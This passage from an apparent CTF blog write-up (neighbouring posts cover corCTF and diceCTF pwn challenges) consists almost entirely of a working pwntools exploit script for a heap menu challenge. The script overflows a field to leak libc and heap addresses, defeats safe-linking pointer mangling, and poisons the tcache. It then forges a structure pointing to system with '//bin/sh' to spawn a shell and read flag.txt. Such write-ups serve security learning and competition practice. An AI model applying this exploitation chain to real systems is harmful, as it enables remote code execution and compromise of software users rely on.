pwn.process([exe.path] + argv, *a, **kw)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">remote</span>(<span class="params">argv=[], *a, **kw</span>):</span><br><span class="line">    <span class="string">&#x27;&#x27;&#x27;Connect to the process on the remote host&#x27;&#x27;&#x27;</span></span><br><span class="line">    io = pwn.connect(host, port)</span><br><span class="line">    <span class="keyword">if</span> pwn.args.GDB:</span><br><span class="line">        pwn.gdb.attach(io, gdbscript=gdbscript)</span><br><span class="line">    <span class="keyword">return</span> io</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">start</span>(<span class="params">argv=[], *a, **kw</span>):</span><br><span class="line">    <span class="string">&#x27;&#x27;&#x27;Start the exploit against the target.&#x27;&#x27;&#x27;</span></span><br><span class="line">    <span class="keyword">if</span> pwn.args.LOCAL:</span><br><span class="line">        <span class="keyword">return</span> local(argv, *a, **kw)</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        <span class="keyword">return</span> remote(argv, *a, **kw)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">gdbscript = <span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">continue</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span>.<span class="built_in">format</span>(**<span class="built_in">locals</span>())</span><br><span class="line"></span><br><span class="line">io = <span class="literal">None</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">io = start()</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">add</span>(<span class="params">idx, size, firstname, midname, lastname, age, bio, l=<span class="literal">True</span></span>):</span><br><span class="line">    io.sendlineafter(<span class="string">b&quot;5 re-age user\n&quot;</span>, <span class="string">b&quot;1&quot;</span>)</span><br><span class="line">    io.sendlineafter(<span class="string">b&quot;index: \n&quot;</span>, <span class="built_in">str</span>(idx).encode())</span><br><span class="line">    io.sendlineafter(<span class="string">b&quot;Enter size (1032 minimum): \n&quot;</span>, <span class="built_in">str</span>(size).encode())</span><br><span class="line">    <span class="keyword">if</span> l:</span><br><span class="line">        io.sendlineafter(<span class="string">b&quot;Input firstname: \n&quot;</span>, firstname)</span><br><span class="line">        io.sendlineafter(<span class="string">b&quot;Input middlename: \n&quot;</span>, midname)</span><br><span class="line">        io.sendlineafter(<span class="string">b&quot;Input lastname: \n&quot;</span>, lastname)</span><br><span class="line">        io.sendlineafter(<span class="string">b&quot;Input age: \n&quot;</span>, <span class="built_in">str</span>(age).encode())</span><br><span class="line">        io.sendlineafter(<span class="string">b&quot;Input bio: \n&quot;</span>, bio)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        io.sendafter(<span class="string">b&quot;Input firstname: \n&quot;</span>, firstname)</span><br><span class="line">        io.sendafter(<span class="string">b&quot;Input middlename: \n&quot;</span>, midname)</span><br><span class="line">        io.sendafter(<span class="string">b&quot;Input lastname: \n&quot;</span>, lastname)</span><br><span class="line">        io.sendafter(<span class="string">b&quot;Input age: \n&quot;</span>, <span class="built_in">str</span>(age).encode())</span><br><span class="line">        io.sendafter(<span class="string">b&quot;Input bio: \n&quot;</span>, bio)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">show</span>(<span class="params">idx</span>):</span><br><span class="line">    io.sendlineafter(<span class="string">b&quot;5 re-age user\n&quot;</span>, <span class="string">b&quot;2&quot;</span>)</span><br><span class="line">    io.sendlineafter(<span class="string">b&quot;index: &quot;</span>, <span class="built_in">str</span>(idx).encode())</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">delete</span>(<span class="params">idx</span>):</span><br><span class="line">    io.sendlineafter(<span class="string">b&quot;5 re-age user\n&quot;</span>, <span class="string">b&quot;3&quot;</span>)</span><br><span class="line">    io.sendlineafter(<span class="string">b&quot;index: &quot;</span>, <span class="built_in">str</span>(idx).encode())</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">edit</span>(<span class="params">idx, firstname, midname, lastname, age, bio</span>):</span><br><span class="line">    io.sendlineafter(<span class="string">b&quot;5 re-age user\n&quot;</span>, <span class="string">b&quot;4&quot;</span>)</span><br><span class="line">    io.sendlineafter(<span class="string">b&quot;index: &quot;</span>, <span class="built_in">str</span>(idx).encode())</span><br><span class="line">    </span><br><span class="line">    io.sendlineafter(<span class="string">b&quot;Input firstname: \n&quot;</span>, firstname)</span><br><span class="line">    io.sendlineafter(<span class="string">b&quot;Input middlename: \n&quot;</span>, midname)</span><br><span class="line">    io.sendlineafter(<span class="string">b&quot;Input lastname: \n&quot;</span>, lastname)</span><br><span class="line">    io.sendlineafter(<span class="string">b&quot;Input age: \n&quot;</span>, <span class="built_in">str</span>(age).encode())</span><br><span class="line">    io.sendlineafter(<span class="string">b&quot;)\n&quot;</span>, bio)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">decrypt_pointer</span>(<span class="params">leak: <span class="built_in">int</span></span>) -&gt; <span class="built_in">int</span>:</span><br><span class="line">    parts = []</span><br><span class="line"></span><br><span class="line">    parts.append((leak &gt;&gt; <span class="number">36</span>) &lt;&lt; <span class="number">36</span>)</span><br><span class="line">    parts.append((((leak &gt;&gt; <span class="number">24</span>) &amp; <span class="number">0xFFF</span>) ^ (parts[<span class="number">0</span>] &gt;&gt; <span class="number">36</span>)) &lt;&lt; <span class="number">24</span>)</span><br><span class="line">    parts.append((((leak &gt;&gt; <span class="number">12</span>) &amp; <span class="number">0xFFF</span>) ^ ((parts[<span class="number">1</span>] &gt;&gt; <span class="number">24</span>) &amp; <span class="number">0xFFF</span>)) &lt;&lt; <span class="number">12</span>)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> parts[<span class="number">0</span>] | parts[<span class="number">1</span>] | parts[<span class="number">2</span>]</span><br><span class="line"></span><br><span class="line">add(<span class="number">0</span>, <span class="number">1032</span>, <span class="string">b&quot;//bin/sh\x00&quot;</span>, <span class="string">b&quot;&quot;</span>, <span class="string">b&quot;&quot;</span>, <span class="number">1337</span>, <span class="string">b&quot;&quot;</span>)</span><br><span class="line">add(<span class="number">1</span>, <span class="number">1032</span>, <span class="string">b&quot;&quot;</span>, <span class="string">b&quot;&quot;</span>, <span class="string">b&quot;&quot;</span>, <span class="number">1337</span>, <span class="string">b&quot;&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">2</span>, <span class="number">7</span>+<span class="number">2</span> + <span class="number">2</span>):</span><br><span class="line">    add(i, <span class="number">1032</span>, <span class="string">b&quot;&quot;</span>, <span class="string">b&quot;&quot;</span>, <span class="string">b&quot;&quot;</span>, <span class="number">1337</span>, <span class="string">b&quot;&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">2</span>, <span class="number">7</span>+<span class="number">2</span>):</span><br><span class="line">    delete(i)</span><br><span class="line"></span><br><span class="line">delete(<span class="number">1</span>)</span><br><span class="line">edit(<span class="number">0</span>, <span class="string">b&quot;&quot;</span>, <span class="string">b&quot;&quot;</span>, <span class="string">b&quot;&quot;</span>, <span class="number">1337</span>, <span class="string">b&quot;Y&quot;</span>*(<span class="number">1032</span> - <span class="number">64</span> + <span class="number">7</span>))</span><br><span class="line"></span><br><span class="line">show(<span class="number">0</span>)</span><br><span class="line">io.recvuntil(<span class="string">b&quot;Y&quot;</span>*(<span class="number">1032</span> - <span class="number">64</span> + <span class="number">7</span>) + <span class="string">b&quot;\n&quot;</span>)</span><br><span class="line">libc.address = pwn.u64(io.recvuntil(<span class="string">b&quot;1 Add\n&quot;</span>)[:-<span class="number">6</span>].ljust(<span class="number">8</span>, <span class="string">b&quot;\x00&quot;</span>)) - <span class="number">0x1c7cc0</span></span><br><span class="line">pwn.log.info(<span class="string">f&quot;libc: <span class="subst">&#123;<span class="built_in">hex</span>(libc.address)&#125;</span>&quot;</span>)</span><br><span class="line"></span><br><span class="line">add(<span class="number">11</span>, <span class="number">1032</span>, <span class="string">b&quot;&quot;</span>, <span class="string">b&quot;&quot;</span>, <span class="string">b&quot;&quot;</span>, <span class="number">1337</span>, <span class="string">b&quot;&quot;</span>)</span><br><span class="line"></span><br><span class="line">delete(<span class="number">9</span>)</span><br><span class="line"></span><br><span class="line">edit(<span class="number">11</span>, <span class="string">b&quot;&quot;</span>, <span class="string">b&quot;&quot;</span>, <span class="string">b&quot;&quot;</span>, <span class="number">1337</span>, <span class="string">b&quot;X&quot;</span>*(<span class="number">1032</span> - <span class="number">64</span> + <span class="number">7</span>))</span><br><span class="line"></span><br><span class="line">show(<span class="number">11</span>)</span><br><span class="line">io.recvuntil(<span class="string">b&quot;X&quot;</span>*(<span class="number">1032</span> - <span class="number">64</span> + <span class="number">7</span>) + <span class="string">b&quot;\n&quot;</span>)</span><br><span class="line">heap = decrypt_pointer(pwn.u64(io.recvuntil(<span class="string">b&quot;1 Add\n&quot;</span>)[:-<span class="number">6</span>].ljust(<span class="number">8</span>, <span class="string">b&quot;\x00&quot;</span>))) - <span class="number">0x1000</span></span><br><span class="line">pwn.log.info(<span class="string">f&quot;heap: <span class="subst">&#123;<span class="built_in">hex</span>(heap)&#125;</span>&quot;</span>)</span><br><span class="line"></span><br><span class="line">environ = libc.address + <span class="number">0xbe02f0</span></span><br><span class="line"></span><br><span class="line">edit(<span class="number">11</span>, <span class="string">b&quot;&quot;</span>, <span class="string">b&quot;&quot;</span>, <span class="string">b&quot;&quot;</span>, <span class="number">1337</span>, <span class="string">b&quot;X&quot;</span>*(<span class="number">1032</span> - <span class="number">64</span>) + pwn.p64(<span class="number">0x411</span>) + pwn.p64(((heap + <span class="number">0x2730</span>) &gt;&gt; <span class="number">12</span>) ^ (<span class="number">0x404010</span>)))</span><br><span class="line"></span><br><span class="line"><span class="comment"># dumb</span></span><br><span class="line">add(<span class="number">12</span>, <span class="number">1032</span>, <span class="string">b&quot;&quot;</span>, <span class="string">b&quot;&quot;</span>, <span class="string">b&quot;&quot;</span>, <span class="number">1337</span>, <span class="string">b&quot;&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">#===</span></span><br><span class="line"></span><br><span class="line">io.sendlineafter(<span class="string">b&quot;5 re-age user\n&quot;</span>, <span class="string">b&quot;1&quot;</span>)</span><br><span class="line">io.sendlineafter(<span class="string">b&quot;index: \n&quot;</span>, <span class="built_in">str</span>(<span class="number">13</span>).encode())</span><br><span class="line">io.sendlineafter(<span class="string">b&quot;Enter size (1032 minimum): \n&quot;</span>, <span class="built_in">str</span>(<span class="number">1032</span>).encode())</span><br><span class="line">io.sendafter(<span class="string">b&quot;Input firstname: \n&quot;</span>, pwn.p64(libc.address + <span class="number">0xbbdf80</span>))</span><br><span class="line">io.sendafter(<span class="string">b&quot;Input middlename: \n&quot;</span>, pwn.p64(libc.sym.system))</span><br><span class="line">io.sendafter(<span class="string">b&quot;Input lastname: \n&quot;</span>, pwn.p64(libc.address + <span class="number">0x71ab0</span>))</span><br><span class="line">io.sendlineafter(<span class="string">b&quot;Input age: \n&quot;</span>, <span class="built_in">str</span>(<span class="number">0</span>).encode())</span><br><span class="line">io.sendafter(<span class="string">b&quot;Input bio: \n&quot;</span>, pwn.p64(libc.address + <span class="number">0x4cb40</span>))</span><br><span class="line"></span><br><span class="line">delete(<span class="number">0</span>)</span><br><span class="line">io.sendline(<span class="string">b&quot;cat flag.txt&quot;</span>)</span><br><span class="line">pwn.log.info(<span class="string">f&quot;flag: <span class="subst">&#123;io.recvline()&#125;</span>&quot;</span>)</span><br><span class="line"></span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>
        
      </div>

         
    </div>
    
     
  </div>
  
    
<nav id="article-nav">
  <a class="article-nav-btn left "
    
      href="/posts/zigzag/"
      title="[corCTF 2022 - pwn] zigzag"
     >
    <i class="fa-solid fa-angle-left"></i>
    <p class="title-text">
      
        [corCTF 2022 - pwn] zigzag
        
    </p>
  </a>
  <a class="article-nav-btn right "
    
      href="/posts/catastrophe/"
      title="[diceCTF 2022 - pwn] catastrophe"
     >

    <p class="title-text">
      
        [diceCTF 2022 - pwn] catastrophe
        
    </p>
    <i class="fa-solid fa-angle-right"></i>
  </a>
</nav>


  
</article>

 
    </div>
    <div id="footer-wrapper">
      <footer id="footer">
  
  <div id="footer-info" class="inner">
    
    &copy; 2023 nasm<br>
    Powered by <a href="https://hexo.io/" target="_blank">Hexo</a> & Theme <a target="_blank" rel="noopener" href="https://github.com/saicaca/hexo-theme-vivia">Vivia</a>
  </div>
</footer>

    </div>
    <div class="back-to-top-wrapper">
    <button id="back-to-top-btn" class="back-to-top-btn" onclick="topFunction()">
        <span class="material-symbols-rounded">keyboard_arrow_up</span>
    </button>
</div>

<script>
    function topFunction() {
        window.scroll({ top: 0, behavior: 'smooth' });
    }
    let btn = document.getElementById('back-to-top-btn');
    function scrollFunction() {
        if (document.body.scrollTop > 600 || document.documentElement.scrollTop > 600) {
            btn.style.opacity = 1;
        } else {
            btn.style.opacity = 0;
        }
    }
    window.onscroll = function() {
        scrollFunction();
    }
</script>

  </div>
  <script src="/js/light-dark-switch.js"></script>
</body>
</html>
